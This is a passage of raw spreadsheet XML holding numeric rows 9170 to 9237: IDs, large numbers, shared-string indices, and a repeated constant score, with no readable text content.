      <c r="C9170" s="2" t="s">
        <v>8749</v>
      </c>
      <c r="D9170" s="2">
        <v>1.0</v>
      </c>
      <c r="E9170" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9170" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9171" ht="15.75" customHeight="1">
      <c r="A9171" s="1">
        <v>9487.0</v>
      </c>
      <c r="B9171" s="2">
        <v>5.5909511E7</v>
      </c>
      <c r="C9171" s="2" t="s">
        <v>8750</v>
      </c>
      <c r="D9171" s="2">
        <v>1.0</v>
      </c>
      <c r="E9171" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9171" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9172" ht="15.75" customHeight="1">
      <c r="A9172" s="1">
        <v>9733.0</v>
      </c>
      <c r="B9172" s="2">
        <v>5.6447103E7</v>
      </c>
      <c r="C9172" s="2" t="s">
        <v>8751</v>
      </c>
      <c r="D9172" s="2">
        <v>1.0</v>
      </c>
      <c r="E9172" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9172" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9173" ht="15.75" customHeight="1">
      <c r="A9173" s="1">
        <v>9845.0</v>
      </c>
      <c r="B9173" s="2">
        <v>5.6677625E7</v>
      </c>
      <c r="C9173" s="2" t="s">
        <v>8752</v>
      </c>
      <c r="D9173" s="2">
        <v>1.0</v>
      </c>
      <c r="E9173" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9173" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9174" ht="15.75" customHeight="1">
      <c r="A9174" s="1">
        <v>9938.0</v>
      </c>
      <c r="B9174" s="2">
        <v>5.6850033E7</v>
      </c>
      <c r="C9174" s="2" t="s">
        <v>8753</v>
      </c>
      <c r="D9174" s="2">
        <v>1.0</v>
      </c>
      <c r="E9174" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9174" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9175" ht="15.75" customHeight="1">
      <c r="A9175" s="1">
        <v>10145.0</v>
      </c>
      <c r="B9175" s="2">
        <v>5.7308312E7</v>
      </c>
      <c r="C9175" s="2" t="s">
        <v>8754</v>
      </c>
      <c r="D9175" s="2">
        <v>1.0</v>
      </c>
      <c r="E9175" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9175" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9176" ht="15.75" customHeight="1">
      <c r="A9176" s="1">
        <v>10214.0</v>
      </c>
      <c r="B9176" s="2">
        <v>5.7434949E7</v>
      </c>
      <c r="C9176" s="2" t="s">
        <v>8755</v>
      </c>
      <c r="D9176" s="2">
        <v>1.0</v>
      </c>
      <c r="E9176" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9176" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9177" ht="15.75" customHeight="1">
      <c r="A9177" s="1">
        <v>10236.0</v>
      </c>
      <c r="B9177" s="2">
        <v>5.7524829E7</v>
      </c>
      <c r="C9177" s="2" t="s">
        <v>8756</v>
      </c>
      <c r="D9177" s="2">
        <v>1.0</v>
      </c>
      <c r="E9177" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9177" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9178" ht="15.75" customHeight="1">
      <c r="A9178" s="1">
        <v>10345.0</v>
      </c>
      <c r="B9178" s="2">
        <v>5.7733834E7</v>
      </c>
      <c r="C9178" s="2" t="s">
        <v>8757</v>
      </c>
      <c r="D9178" s="2">
        <v>1.0</v>
      </c>
      <c r="E9178" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9178" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9179" ht="15.75" customHeight="1">
      <c r="A9179" s="1">
        <v>10427.0</v>
      </c>
      <c r="B9179" s="2">
        <v>1.0331374E7</v>
      </c>
      <c r="C9179" s="2" t="s">
        <v>8758</v>
      </c>
      <c r="D9179" s="2">
        <v>1.0</v>
      </c>
      <c r="E9179" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9179" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9180" ht="15.75" customHeight="1">
      <c r="A9180" s="1">
        <v>10512.0</v>
      </c>
      <c r="B9180" s="2">
        <v>1.1718416E7</v>
      </c>
      <c r="C9180" s="2" t="s">
        <v>8759</v>
      </c>
      <c r="D9180" s="2">
        <v>1.0</v>
      </c>
      <c r="E9180" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9180" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9181" ht="15.75" customHeight="1">
      <c r="A9181" s="1">
        <v>10850.0</v>
      </c>
      <c r="B9181" s="2">
        <v>1.619992E7</v>
      </c>
      <c r="C9181" s="2" t="s">
        <v>8760</v>
      </c>
      <c r="D9181" s="2">
        <v>1.0</v>
      </c>
      <c r="E9181" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9181" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9182" ht="15.75" customHeight="1">
      <c r="A9182" s="1">
        <v>10951.0</v>
      </c>
      <c r="B9182" s="2">
        <v>1.7116218E7</v>
      </c>
      <c r="C9182" s="2" t="s">
        <v>8761</v>
      </c>
      <c r="D9182" s="2">
        <v>1.0</v>
      </c>
      <c r="E9182" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9182" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9183" ht="15.75" customHeight="1">
      <c r="A9183" s="1">
        <v>10986.0</v>
      </c>
      <c r="B9183" s="2">
        <v>1.7409275E7</v>
      </c>
      <c r="C9183" s="2" t="s">
        <v>8762</v>
      </c>
      <c r="D9183" s="2">
        <v>1.0</v>
      </c>
      <c r="E9183" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9183" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9184" ht="15.75" customHeight="1">
      <c r="A9184" s="1">
        <v>11276.0</v>
      </c>
      <c r="B9184" s="2">
        <v>2.0769407E7</v>
      </c>
      <c r="C9184" s="2" t="s">
        <v>8763</v>
      </c>
      <c r="D9184" s="2">
        <v>1.0</v>
      </c>
      <c r="E9184" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9184" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9185" ht="15.75" customHeight="1">
      <c r="A9185" s="1">
        <v>11336.0</v>
      </c>
      <c r="B9185" s="2">
        <v>2.1194739E7</v>
      </c>
      <c r="C9185" s="2" t="s">
        <v>8763</v>
      </c>
      <c r="D9185" s="2">
        <v>1.0</v>
      </c>
      <c r="E9185" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9185" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9186" ht="15.75" customHeight="1">
      <c r="A9186" s="1">
        <v>11396.0</v>
      </c>
      <c r="B9186" s="2">
        <v>2.1583573E7</v>
      </c>
      <c r="C9186" s="2" t="s">
        <v>8764</v>
      </c>
      <c r="D9186" s="2">
        <v>1.0</v>
      </c>
      <c r="E9186" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9186" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9187" ht="15.75" customHeight="1">
      <c r="A9187" s="1">
        <v>11452.0</v>
      </c>
      <c r="B9187" s="2">
        <v>2.1809962E7</v>
      </c>
      <c r="C9187" s="2" t="s">
        <v>8765</v>
      </c>
      <c r="D9187" s="2">
        <v>1.0</v>
      </c>
      <c r="E9187" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9187" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9188" ht="15.75" customHeight="1">
      <c r="A9188" s="1">
        <v>11786.0</v>
      </c>
      <c r="B9188" s="2">
        <v>2.4342701E7</v>
      </c>
      <c r="C9188" s="2" t="s">
        <v>8766</v>
      </c>
      <c r="D9188" s="2">
        <v>1.0</v>
      </c>
      <c r="E9188" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9188" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9189" ht="15.75" customHeight="1">
      <c r="A9189" s="1">
        <v>12287.0</v>
      </c>
      <c r="B9189" s="2">
        <v>2.8191257E7</v>
      </c>
      <c r="C9189" s="2" t="s">
        <v>8767</v>
      </c>
      <c r="D9189" s="2">
        <v>1.0</v>
      </c>
      <c r="E9189" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9189" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9190" ht="15.75" customHeight="1">
      <c r="A9190" s="1">
        <v>12494.0</v>
      </c>
      <c r="B9190" s="2">
        <v>2.9564124E7</v>
      </c>
      <c r="C9190" s="2" t="s">
        <v>8768</v>
      </c>
      <c r="D9190" s="2">
        <v>1.0</v>
      </c>
      <c r="E9190" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9190" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9191" ht="15.75" customHeight="1">
      <c r="A9191" s="1">
        <v>12558.0</v>
      </c>
      <c r="B9191" s="2">
        <v>2.9903428E7</v>
      </c>
      <c r="C9191" s="2" t="s">
        <v>8769</v>
      </c>
      <c r="D9191" s="2">
        <v>1.0</v>
      </c>
      <c r="E9191" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9191" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9192" ht="15.75" customHeight="1">
      <c r="A9192" s="1">
        <v>13089.0</v>
      </c>
      <c r="B9192" s="2">
        <v>3.3406969E7</v>
      </c>
      <c r="C9192" s="2" t="s">
        <v>8770</v>
      </c>
      <c r="D9192" s="2">
        <v>1.0</v>
      </c>
      <c r="E9192" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9192" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9193" ht="15.75" customHeight="1">
      <c r="A9193" s="1">
        <v>13301.0</v>
      </c>
      <c r="B9193" s="2">
        <v>3.4497527E7</v>
      </c>
      <c r="C9193" s="2" t="s">
        <v>8771</v>
      </c>
      <c r="D9193" s="2">
        <v>1.0</v>
      </c>
      <c r="E9193" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9193" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9194" ht="15.75" customHeight="1">
      <c r="A9194" s="1">
        <v>13330.0</v>
      </c>
      <c r="B9194" s="2">
        <v>3.4641539E7</v>
      </c>
      <c r="C9194" s="2" t="s">
        <v>8772</v>
      </c>
      <c r="D9194" s="2">
        <v>1.0</v>
      </c>
      <c r="E9194" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9194" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9195" ht="15.75" customHeight="1">
      <c r="A9195" s="1">
        <v>13473.0</v>
      </c>
      <c r="B9195" s="2">
        <v>3.5276543E7</v>
      </c>
      <c r="C9195" s="2" t="s">
        <v>8773</v>
      </c>
      <c r="D9195" s="2">
        <v>1.0</v>
      </c>
      <c r="E9195" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9195" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9196" ht="15.75" customHeight="1">
      <c r="A9196" s="1">
        <v>13620.0</v>
      </c>
      <c r="B9196" s="2">
        <v>3.5868959E7</v>
      </c>
      <c r="C9196" s="2" t="s">
        <v>8774</v>
      </c>
      <c r="D9196" s="2">
        <v>1.0</v>
      </c>
      <c r="E9196" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9196" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9197" ht="15.75" customHeight="1">
      <c r="A9197" s="1">
        <v>13761.0</v>
      </c>
      <c r="B9197" s="2">
        <v>3.6507157E7</v>
      </c>
      <c r="C9197" s="2" t="s">
        <v>8775</v>
      </c>
      <c r="D9197" s="2">
        <v>1.0</v>
      </c>
      <c r="E9197" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9197" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9198" ht="15.75" customHeight="1">
      <c r="A9198" s="1">
        <v>13764.0</v>
      </c>
      <c r="B9198" s="2">
        <v>3.6512833E7</v>
      </c>
      <c r="C9198" s="2" t="s">
        <v>8776</v>
      </c>
      <c r="D9198" s="2">
        <v>1.0</v>
      </c>
      <c r="E9198" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9198" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9199" ht="15.75" customHeight="1">
      <c r="A9199" s="1">
        <v>13777.0</v>
      </c>
      <c r="B9199" s="2">
        <v>3.6554862E7</v>
      </c>
      <c r="C9199" s="2" t="s">
        <v>8777</v>
      </c>
      <c r="D9199" s="2">
        <v>1.0</v>
      </c>
      <c r="E9199" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9199" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9200" ht="15.75" customHeight="1">
      <c r="A9200" s="1">
        <v>13840.0</v>
      </c>
      <c r="B9200" s="2">
        <v>3.6826547E7</v>
      </c>
      <c r="C9200" s="2" t="s">
        <v>8778</v>
      </c>
      <c r="D9200" s="2">
        <v>1.0</v>
      </c>
      <c r="E9200" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9200" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9201" ht="15.75" customHeight="1">
      <c r="A9201" s="1">
        <v>13919.0</v>
      </c>
      <c r="B9201" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C9201" s="2" t="s">
        <v>8779</v>
      </c>
      <c r="D9201" s="2">
        <v>1.0</v>
      </c>
      <c r="E9201" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9201" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9202" ht="15.75" customHeight="1">
      <c r="A9202" s="1">
        <v>13934.0</v>
      </c>
      <c r="B9202" s="2">
        <v>3.7130388E7</v>
      </c>
      <c r="C9202" s="2" t="s">
        <v>8780</v>
      </c>
      <c r="D9202" s="2">
        <v>1.0</v>
      </c>
      <c r="E9202" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9202" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9203" ht="15.75" customHeight="1">
      <c r="A9203" s="1">
        <v>13974.0</v>
      </c>
      <c r="B9203" s="2">
        <v>3.7335427E7</v>
      </c>
      <c r="C9203" s="2" t="s">
        <v>8781</v>
      </c>
      <c r="D9203" s="2">
        <v>1.0</v>
      </c>
      <c r="E9203" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9203" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9204" ht="15.75" customHeight="1">
      <c r="A9204" s="1">
        <v>14386.0</v>
      </c>
      <c r="B9204" s="2">
        <v>3.9051804E7</v>
      </c>
      <c r="C9204" s="2" t="s">
        <v>8782</v>
      </c>
      <c r="D9204" s="2">
        <v>1.0</v>
      </c>
      <c r="E9204" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9204" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9205" ht="15.75" customHeight="1">
      <c r="A9205" s="1">
        <v>14489.0</v>
      </c>
      <c r="B9205" s="2">
        <v>3.9618387E7</v>
      </c>
      <c r="C9205" s="2" t="s">
        <v>8783</v>
      </c>
      <c r="D9205" s="2">
        <v>1.0</v>
      </c>
      <c r="E9205" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9205" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9206" ht="15.75" customHeight="1">
      <c r="A9206" s="1">
        <v>14566.0</v>
      </c>
      <c r="B9206" s="2">
        <v>4.0059117E7</v>
      </c>
      <c r="C9206" s="2" t="s">
        <v>8784</v>
      </c>
      <c r="D9206" s="2">
        <v>1.0</v>
      </c>
      <c r="E9206" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9206" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9207" ht="15.75" customHeight="1">
      <c r="A9207" s="1">
        <v>14714.0</v>
      </c>
      <c r="B9207" s="2">
        <v>4.0627209E7</v>
      </c>
      <c r="C9207" s="2" t="s">
        <v>8785</v>
      </c>
      <c r="D9207" s="2">
        <v>1.0</v>
      </c>
      <c r="E9207" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9207" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9208" ht="15.75" customHeight="1">
      <c r="A9208" s="1">
        <v>14823.0</v>
      </c>
      <c r="B9208" s="2">
        <v>4.0967981E7</v>
      </c>
      <c r="C9208" s="2" t="s">
        <v>8786</v>
      </c>
      <c r="D9208" s="2">
        <v>1.0</v>
      </c>
      <c r="E9208" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9208" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9209" ht="15.75" customHeight="1">
      <c r="A9209" s="1">
        <v>14827.0</v>
      </c>
      <c r="B9209" s="2">
        <v>4.0995074E7</v>
      </c>
      <c r="C9209" s="2" t="s">
        <v>8787</v>
      </c>
      <c r="D9209" s="2">
        <v>1.0</v>
      </c>
      <c r="E9209" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9209" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9210" ht="15.75" customHeight="1">
      <c r="A9210" s="1">
        <v>14983.0</v>
      </c>
      <c r="B9210" s="2">
        <v>4.1395899E7</v>
      </c>
      <c r="C9210" s="2" t="s">
        <v>8788</v>
      </c>
      <c r="D9210" s="2">
        <v>1.0</v>
      </c>
      <c r="E9210" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9210" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9211" ht="15.75" customHeight="1">
      <c r="A9211" s="1">
        <v>15101.0</v>
      </c>
      <c r="B9211" s="2">
        <v>4.1807791E7</v>
      </c>
      <c r="C9211" s="2" t="s">
        <v>8789</v>
      </c>
      <c r="D9211" s="2">
        <v>1.0</v>
      </c>
      <c r="E9211" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9211" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9212" ht="15.75" customHeight="1">
      <c r="A9212" s="1">
        <v>15104.0</v>
      </c>
      <c r="B9212" s="2">
        <v>4.1817252E7</v>
      </c>
      <c r="C9212" s="2" t="s">
        <v>8790</v>
      </c>
      <c r="D9212" s="2">
        <v>1.0</v>
      </c>
      <c r="E9212" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9212" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9213" ht="15.75" customHeight="1">
      <c r="A9213" s="1">
        <v>15330.0</v>
      </c>
      <c r="B9213" s="2">
        <v>4.2551615E7</v>
      </c>
      <c r="C9213" s="2" t="s">
        <v>8791</v>
      </c>
      <c r="D9213" s="2">
        <v>1.0</v>
      </c>
      <c r="E9213" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9213" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9214" ht="15.75" customHeight="1">
      <c r="A9214" s="1">
        <v>15381.0</v>
      </c>
      <c r="B9214" s="2">
        <v>4.2771295E7</v>
      </c>
      <c r="C9214" s="2" t="s">
        <v>8792</v>
      </c>
      <c r="D9214" s="2">
        <v>1.0</v>
      </c>
      <c r="E9214" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9214" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9215" ht="15.75" customHeight="1">
      <c r="A9215" s="1">
        <v>15562.0</v>
      </c>
      <c r="B9215" s="2">
        <v>4.3426859E7</v>
      </c>
      <c r="C9215" s="2" t="s">
        <v>8793</v>
      </c>
      <c r="D9215" s="2">
        <v>1.0</v>
      </c>
      <c r="E9215" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9215" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9216" ht="15.75" customHeight="1">
      <c r="A9216" s="1">
        <v>15585.0</v>
      </c>
      <c r="B9216" s="2">
        <v>4.3442267E7</v>
      </c>
      <c r="C9216" s="2" t="s">
        <v>8794</v>
      </c>
      <c r="D9216" s="2">
        <v>1.0</v>
      </c>
      <c r="E9216" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9216" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9217" ht="15.75" customHeight="1">
      <c r="A9217" s="1">
        <v>15622.0</v>
      </c>
      <c r="B9217" s="2">
        <v>4.3555119E7</v>
      </c>
      <c r="C9217" s="2" t="s">
        <v>8795</v>
      </c>
      <c r="D9217" s="2">
        <v>1.0</v>
      </c>
      <c r="E9217" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9217" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9218" ht="15.75" customHeight="1">
      <c r="A9218" s="1">
        <v>15932.0</v>
      </c>
      <c r="B9218" s="2">
        <v>4.4699775E7</v>
      </c>
      <c r="C9218" s="2" t="s">
        <v>8796</v>
      </c>
      <c r="D9218" s="2">
        <v>1.0</v>
      </c>
      <c r="E9218" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9218" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9219" ht="15.75" customHeight="1">
      <c r="A9219" s="1">
        <v>16113.0</v>
      </c>
      <c r="B9219" s="2">
        <v>4.5410384E7</v>
      </c>
      <c r="C9219" s="2" t="s">
        <v>8797</v>
      </c>
      <c r="D9219" s="2">
        <v>1.0</v>
      </c>
      <c r="E9219" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9219" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9220" ht="15.75" customHeight="1">
      <c r="A9220" s="1">
        <v>16555.0</v>
      </c>
      <c r="B9220" s="2">
        <v>4.6829393E7</v>
      </c>
      <c r="C9220" s="2" t="s">
        <v>8798</v>
      </c>
      <c r="D9220" s="2">
        <v>1.0</v>
      </c>
      <c r="E9220" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9220" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9221" ht="15.75" customHeight="1">
      <c r="A9221" s="1">
        <v>17324.0</v>
      </c>
      <c r="B9221" s="2">
        <v>4.9342879E7</v>
      </c>
      <c r="C9221" s="2" t="s">
        <v>8799</v>
      </c>
      <c r="D9221" s="2">
        <v>1.0</v>
      </c>
      <c r="E9221" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9221" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9222" ht="15.75" customHeight="1">
      <c r="A9222" s="1">
        <v>17633.0</v>
      </c>
      <c r="B9222" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C9222" s="2" t="s">
        <v>8800</v>
      </c>
      <c r="D9222" s="2">
        <v>1.0</v>
      </c>
      <c r="E9222" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9222" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9223" ht="15.75" customHeight="1">
      <c r="A9223" s="1">
        <v>18017.0</v>
      </c>
      <c r="B9223" s="2">
        <v>5.149917E7</v>
      </c>
      <c r="C9223" s="2" t="s">
        <v>8801</v>
      </c>
      <c r="D9223" s="2">
        <v>1.0</v>
      </c>
      <c r="E9223" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9223" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9224" ht="15.75" customHeight="1">
      <c r="A9224" s="1">
        <v>18660.0</v>
      </c>
      <c r="B9224" s="2">
        <v>5.3508443E7</v>
      </c>
      <c r="C9224" s="2" t="s">
        <v>8802</v>
      </c>
      <c r="D9224" s="2">
        <v>1.0</v>
      </c>
      <c r="E9224" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9224" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9225" ht="15.75" customHeight="1">
      <c r="A9225" s="1">
        <v>18662.0</v>
      </c>
      <c r="B9225" s="2">
        <v>5.3511496E7</v>
      </c>
      <c r="C9225" s="2" t="s">
        <v>8803</v>
      </c>
      <c r="D9225" s="2">
        <v>1.0</v>
      </c>
      <c r="E9225" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9225" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9226" ht="15.75" customHeight="1">
      <c r="A9226" s="1">
        <v>18675.0</v>
      </c>
      <c r="B9226" s="2">
        <v>5.3561707E7</v>
      </c>
      <c r="C9226" s="2" t="s">
        <v>8804</v>
      </c>
      <c r="D9226" s="2">
        <v>1.0</v>
      </c>
      <c r="E9226" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9226" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9227" ht="15.75" customHeight="1">
      <c r="A9227" s="1">
        <v>18922.0</v>
      </c>
      <c r="B9227" s="2">
        <v>5.4224643E7</v>
      </c>
      <c r="C9227" s="2" t="s">
        <v>8805</v>
      </c>
      <c r="D9227" s="2">
        <v>1.0</v>
      </c>
      <c r="E9227" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9227" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9228" ht="15.75" customHeight="1">
      <c r="A9228" s="1">
        <v>19337.0</v>
      </c>
      <c r="B9228" s="2">
        <v>5.535027E7</v>
      </c>
      <c r="C9228" s="2" t="s">
        <v>8806</v>
      </c>
      <c r="D9228" s="2">
        <v>1.0</v>
      </c>
      <c r="E9228" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9228" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9229" ht="15.75" customHeight="1">
      <c r="A9229" s="1">
        <v>19895.0</v>
      </c>
      <c r="B9229" s="2">
        <v>5.7298265E7</v>
      </c>
      <c r="C9229" s="2" t="s">
        <v>8807</v>
      </c>
      <c r="D9229" s="2">
        <v>1.0</v>
      </c>
      <c r="E9229" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9229" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9230" ht="15.75" customHeight="1">
      <c r="A9230" s="1">
        <v>19999.0</v>
      </c>
      <c r="B9230" s="2">
        <v>5.7713661E7</v>
      </c>
      <c r="C9230" s="2" t="s">
        <v>8808</v>
      </c>
      <c r="D9230" s="2">
        <v>1.0</v>
      </c>
      <c r="E9230" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9230" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9231" ht="15.75" customHeight="1">
      <c r="A9231" s="1">
        <v>20317.0</v>
      </c>
      <c r="B9231" s="2">
        <v>1.145129E7</v>
      </c>
      <c r="C9231" s="2" t="s">
        <v>8809</v>
      </c>
      <c r="D9231" s="2">
        <v>1.0</v>
      </c>
      <c r="E9231" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9231" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9232" ht="15.75" customHeight="1">
      <c r="A9232" s="1">
        <v>20390.0</v>
      </c>
      <c r="B9232" s="2">
        <v>1.2042746E7</v>
      </c>
      <c r="C9232" s="2" t="s">
        <v>8810</v>
      </c>
      <c r="D9232" s="2">
        <v>1.0</v>
      </c>
      <c r="E9232" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9232" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9233" ht="15.75" customHeight="1">
      <c r="A9233" s="1">
        <v>20547.0</v>
      </c>
      <c r="B9233" s="2">
        <v>1.3380407E7</v>
      </c>
      <c r="C9233" s="2" t="s">
        <v>8811</v>
      </c>
      <c r="D9233" s="2">
        <v>1.0</v>
      </c>
      <c r="E9233" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9233" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9234" ht="15.75" customHeight="1">
      <c r="A9234" s="1">
        <v>20632.0</v>
      </c>
      <c r="B9234" s="2">
        <v>1.4153761E7</v>
      </c>
      <c r="C9234" s="2" t="s">
        <v>8812</v>
      </c>
      <c r="D9234" s="2">
        <v>1.0</v>
      </c>
      <c r="E9234" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9234" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9235" ht="15.75" customHeight="1">
      <c r="A9235" s="1">
        <v>21628.0</v>
      </c>
      <c r="B9235" s="2">
        <v>2.4640848E7</v>
      </c>
      <c r="C9235" s="2" t="s">
        <v>8813</v>
      </c>
      <c r="D9235" s="2">
        <v>1.0</v>
      </c>
      <c r="E9235" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9235" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9236" ht="15.75" customHeight="1">
      <c r="A9236" s="1">
        <v>23695.0</v>
      </c>
      <c r="B9236" s="2">
        <v>7065765.0</v>
      </c>
      <c r="C9236" s="2" t="s">
        <v>8814</v>
      </c>
      <c r="D9236" s="2">
        <v>1.0</v>
      </c>
      <c r="E9236" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9236" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9237" ht="15.75" customHeight="1">
      <c r="A9237" s="1">
        <v>26028.0</v>
      </c>
      <c r="B9237" s="2">
        <v>1.5390379E7</v>
